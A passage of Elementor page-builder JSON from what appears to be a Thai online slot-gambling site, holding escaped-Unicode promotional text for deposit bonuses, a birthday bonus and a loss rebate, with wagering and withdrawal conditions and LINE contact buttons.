\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/20_get_100_-_Megabet333-Biz.webp\",\"id\":161,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_get_200_7turn_-_Megabet333-Biz.webp\",\"id\":157,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Free_bonus_100_-_Megabet333-Biz.webp\",\"id\":158,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/HBD_-_Megabet333-Biz.webp\",\"id\":159,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Reward_10_-_Megabet333-Biz.webp\",\"id\":160,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 